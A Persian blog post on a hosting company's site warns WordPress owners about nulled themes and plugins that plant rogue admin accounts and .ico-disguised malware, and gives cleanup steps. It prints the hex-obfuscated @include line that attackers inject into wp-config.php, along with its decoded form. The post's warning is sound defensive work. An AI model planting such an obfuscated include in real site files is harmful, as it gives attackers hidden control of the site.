1

  • 026-910-10-914
  • info@one3erver.com
    • Farsi
    • English
  • عضویت
  • پنل کاربری
وان سرور Menu   ≡ ╳
  • صفحه اصلی
  • سرور مجازی
    • سرور مجازی آمریکا
    • سرور مجازی فرانسه
    • سرور مجازی آلمان
    • سرور مجازی هلند
    • سرور مجازی حرفه ای Nvme
    • سرور مجازی ارزان انگلیس ( آنی )
    • سرور مجازی ارزان NVMe ( آنی )
    • سرور مجازی آسیا
      • سنگاپور ، استرالیا
      • ترکیه ، ژاپن ، امارات ، هنگ کنگ
  • سرور اختصاصی
    • سرور اختصاصی هلند
    • سرور اختصاصی OVH
    • سرور اختصاصی آمریکا
  • هاستینگ و دامنه
    • هاست استاندارد ارزان
    • هاست پر سرعت NVMe
    • هاست شرکتی NVMe
    • هاست ریسلری
    • ثبت آنلاین دامنه
    • صدور گواهینامه ssl
  • دیگر سرویسها
    • سرور مجازی ترید
    • سرور وبینار ( کلاس آنلاین )
  • جزیره آموزشی
  • درباره ما
    • تماس با ما
    • قوانین کلی سایت وان سرور
    • نماد اعتماد
    • سوالات متدوال
    • فرصت شغلی

هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

  • 12/12/2017
  • 0 Comments
زمان تقریبی مطالعه: 2 دقیقه

هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی
قبلا چندین بار هشدار دادیم و کسی توجه نکرد
متاسفانه قالب ها و افزونه های نال ، بازاری شده برای برخی کاربران و فکر این را نمی کنند که زحمت چند ساله یک شخص را می توانند به باد دهند
عزیزان خواهش می کنم از این قالب ها استفاده نکنید اگر قصد استفاده هم دارید احتیاط کنید
هکر با استفاده از کد های مخربی که در این قالب ها و افزونه ها وجود دارد استفاده کرده و کارهای زیر را انجام می دهد .
– چند مدیریت برای خویش فعال می کنند
– با استفاده از مدیریت فایل های مخرب بسیار در هاست آپلود می کنند (از طریق ویرایشگرها )
فایل اصلی آنها با پسوند .ico بوده و دارای امضایی با نوشته می باشد.
من نام دوتا فایل را برای نمونه که از دوسایت کاربران هک شده یافتم قرار می دهم .
favicon_3a0642.ico
favicon_993c6a.ico
حالا با آن دسترسی ها همه جا را ویرایش و خراب می کنند
در فایل wp-config.php فایل ایکن و ویروس خود را با چنین کدهایی فراخوانی می کنن:

@include  "\x2fh\x6fm\x65/\x6ea\x67h\x61s\x68y\x2fp\x75b\x6ci\x63_\x68t\x6dl  \x2fw\x70-\x63o\x6et\x65n\x74/\x75p\x6co\x61d\x73/\x66a\x76i\x63o\x6e_\x399\x33c\x36a\x2ei\x63o";

اولین نفری باشید که از آموزشها و تخفیفهای ویژه با خبر میشوید 😉
با عضویت در خبرنامه از 80 درصد تخفیف بهره مند شوید

که دیکد آن چنین می شود:

@include "/home/8888/public_html/wp-content/uploads/favicon_993c6a.ico";

حال با توجه به فایل با استفاده از دستوراتی که در آن فایل هست همه کار می کنند مثلا در چند جا من دیدم که ایمیل تبلیغاتی می فرستند …..

حال چطور این طور سایت ها را رفع مشکل کنیم
1- اول وارد مدیریت شده و مدیران را بررسی و کاربر اضافی با دسترسی مدیریت را پاک می کنیم
2- وارد سایت شده و اکانت های اف تی پی را بررسی می کنیم
3- وارد سایت شده و فایل کانفیگ را باز کرده و کد های کد شده در سایت unphp.net زده و مسیر فایل آیکن را مشخص می کنیم و کد را نیز از فایل کانفیگ حذف می کنیم
4- سطح فایل کانفیگ را 444 قرار می دهیم
5- جستجو کرده و فایل های مشکوک را نیز حذف می کنیم
6- بر روی پوشه مدیریت پسورد می گذاریم
7- برای پوشه های آپلود و برخی افزونه ها فایل ایندکس قرار می هیم.

برگرفته شده از انجمن وردپرس ایرانی

Rate this post
  • previous post
  • Next post

Leave a Comment لغو پاسخ

X

Search


ربات پشتیبان سرور و هاست


Recent Posts

ترید در فارکس
23/01/2021
WAF چیست؟
13/01/2021
آموزش نصب و راه اندازی آپاچی (Apache) به همراه SSL
10/01/2021
آموزش نصب و پیکربندی DHCP سرور بر روی CentOS
06/01/2021
آموزش نصب و پیکربندی دایرکت ادمین (DirectAdmin)
05/01/2021

دسته‌ها

  • آموزش سئو و بهینه سازی
  • آموزش کنترل پنل ها
  • آموزش نرم افزارهای اکانتینگ
  • آموزش های سرورمجازی لینوکس
  • آموزش های سرورمجازی میکروتیک
  • آموزش های سرورمجازی ویندوز
  • آموزش های نرم افزارها
  • آموزش های هاست
  • اخبارهای ویژه
  • ادوب کانکت
  • اینستاگرام
  • تست نفوذ و امنیت
  • چیستان
  • دانلود سنتر
  • دسته‌بندی نشده



0

28000

محاسبه گر قیمت:
قیمت واحد: 28000
درگاه پرداخت
درگاه پرداخت
نماد اعتماد
نماد اعتماد
دسترسی سریع
  • قوانین سایت
  • سوالات متداول
  • نمایندگی
  • درخواست پشتیبانی
  • پنل کاربران
  • تماس با ما


  • logo-samandehi
    سرورهای مجازی
  • سرور مجازی آمریکا
  • سرور مجازی فرانسه
  • سرور مجازی آلمان
  • سرور مجازی هلند
  • سرور مجازی NVMe
  • سرور مجازی ارزان
  • دسته بندی جزیره
    • آموزش سئو و بهینه سازی
    • آموزش کنترل پنل ها
    • آموزش نرم افزارهای اکانتینگ
    • آموزش های سرورمجازی لینوکس
    • آموزش های سرورمجازی میکروتیک
    • آموزش های سرورمجازی ویندوز
    • آموزش های نرم افزارها
    • آموزش های هاست
    • اخبارهای ویژه
    • ادوب کانکت
    • اینستاگرام
    • تست نفوذ و امنیت
    • چیستان
    • دانلود سنتر
    • دسته‌بندی نشده
    Copyright © 2011-2021 one3erver.com. All Rights Reserved